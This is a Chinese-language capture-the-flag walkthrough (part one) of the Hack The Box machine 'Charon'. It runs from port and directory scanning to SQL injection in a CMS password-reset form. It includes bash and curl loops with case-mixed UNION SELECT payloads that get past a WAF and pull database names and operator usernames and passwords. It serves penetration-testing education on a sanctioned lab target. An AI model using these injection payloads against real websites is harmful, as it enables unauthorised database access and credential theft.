HTB:Charon渗透测试(一)

简介: HTB:Charon渗透测试

HackTheBox-Linux-Charon-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/42

靶机难度:中级(3.5/10)

靶机发布日期:2017年10月7日

靶机描述:

Charon is definitely one of the more challenging machines on HackTheBox. It does not require any advanced techniques, however there are many subtle tricks needed at almost every step of exploitation.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集:

1.端口扫描

nmap发现开放了OpenSSH和Apache服务。

4dadf8ef342c324c579a206c3da5123a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

访问80端口,发现是一个cms界面。

ad76257912de425a9c9213ea5b62c3cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

翻了一下,没有可用的地方。

ccf6b4b09682f9b784f5cc986d072646_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.目录扫描

使用gobuster进行目录扫描

gobuster 
dir-u http://10.10.10.31 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php -o scans/gobuster-root-small-php -t 40

扫描发现存在cmsdata目录。

86b9a438ee08b21a9643f9ce3d30531d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

访问一下,发现是一个登录框,测试几个弱口令没成功。


996babce8d97f689aacd8789c3064c52_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

e6a0d9cf3c76793c2a7de479f7ceba1a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现有一个忘记密码功能。butp抓包测试sql注入。

53733c0c96ba2d7cd92dbf7c63156a9e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

二、漏洞利用

3.sql注入

输入'报错,然后输入"提提升找不到这个emali。证明存在sql注入。

ef5f4bc1e1bced74b02416cafc8e0781_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

d910e8f0fdb481faae6dc091ddd55051_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用limit进行判断字段。

74c4cff6c9148f11bb50ca49322b79da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

1.脚本测试

使用脚本枚举出了可用的用户名。

for i in{1..1000};do curl -s http://10.10.10.31/cmsdata/forgot.php --data-urlencode"email=a@b.c' or 1=1 limit ${i},1;-- -" | grep'<h2>' | awk'{print $5}' | grep-v"^with"||break;done

for i in $(seq 0 300); do
        payload="email=a@b.com' UNIoN SELECT 1,2,3,CONCAT(__username_, ':', __password_, '@b.com') FROM supercms.operators LIMIT 1 OFFSET $i-- -"
        curl -s -d "$payload" http://10.10.10.31/cmsdata/forgot.php | grep -o '[^ ]*@b.com'
        done

22ef15d30cd554aec0ca484316fa72cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.手工union联合查询Bypass waf

经过测试,发现在查到第4位的时候会出现报错。

59c41b61448f894934a348c1a5e31035_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

猜测可能存在waf拦截,然后经过测试,将UNION  SELECT都使用大写进行

测试,可以成功测试注入。

f8278b6723b43c662d8ae5c523bcf844_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

0c3ccd63628c4535d5f9e7a617dbf651_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用脚本探测那一列是电子邮箱的地址。

for i in $(seq 0 300); dopayload="email=a@b.com' UNIoN SELECT 1,2,3,CONCAT(__username_, ':', __password_, '@b.com') FROM supercms.operators LIMIT 1 OFFSET $i-- -"curl -s -d "$payload" http://10.10.10.31/cmsdata/forgot.php | grep -o '[^ ]*@b.com' done

f8c3aa467f7b1175b0ad1469ff5127c2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

52d0ccbce0110c6ab61c5149ed1514d2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现到了第四列的时候,出现了有关邮箱的格式。

0245f2a0a1c1448600ef18d35a164186_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用脚本枚举数据库。

for i in {0..100}; do curl -s http://10.10.10.31/cmsdata/forgot.php --data-urlencode "email=a@b.c' UNiON SELECT 1,schema_name,3,'a@b.c' from information_schema.schemata limit ${i},1;-- -" | grep '<h2>' | awk '{print $5}' | grep -v "^with$" || break; done | cut -d'>' -f2

cd7587f541e235cb717de0f007e790ae_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用GROUP_CONCATSQL 函数,它将一整列合并为一个结果。

1c089fff50681767ef5c30478482bb36_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

9b94b3ebfcf1191a35e68667fb5859da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

ad476c7b74d99f3038ebc90500cb1125_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

联合查询获取用户名和密码。

118ed21754d5a854539eae753687ac9f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

查找管理员用户名和密码。

f0dce2d016c172bdecff08ea41652c9a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


相关文章
|
网络协议 Linux 网络安全
记一次对HTB:Timelapse的渗透测试
记一次对HTB:Timelapse的渗透测试
163 0
记一次对HTB:Timelapse的渗透测试
|
SQL 安全 前端开发
HTB:Charon渗透测试(二)
HTB:Charon渗透测试
113 0
HTB:Charon渗透测试(二)
|
安全 Shell 网络安全
HTB:Obscurity渗透测试(二)
HTB:Obscurity渗透测试
77 0
HTB:Obscurity渗透测试(二)
|
网络安全 Python
HTB:Obscurity渗透测试(一)
HTB:Obscurity渗透测试
102 0
HTB:Obscurity渗透测试(一)
|
8月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
274 0
|
4月前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
120 0
|
4月前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
194 0
|
前端开发 Linux 网络安全
kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示:   因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。
2185 0
|
数据采集 存储 Linux
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
|
Web App开发 Java 测试技术
kali linux 网络渗透测试学习笔记(三)社会工程学之Java攻击:钓鱼网站制作
一.进入kali linux系统的命令行模式 输入代码; ifconfig 查看获得本机IP地址为:192.168.43.227 然后输入代码:   setoolkit   出现以下界面:       在set后输入1. 二.开始重复输入数字代号 三.写入钓鱼网站的目标 正如下图所示,我们需要先输入本机的IP地址以及端口,之后输入钓鱼网站的网址,这里我们以百度为例,因此输入https://www.baidu.com。
2255 0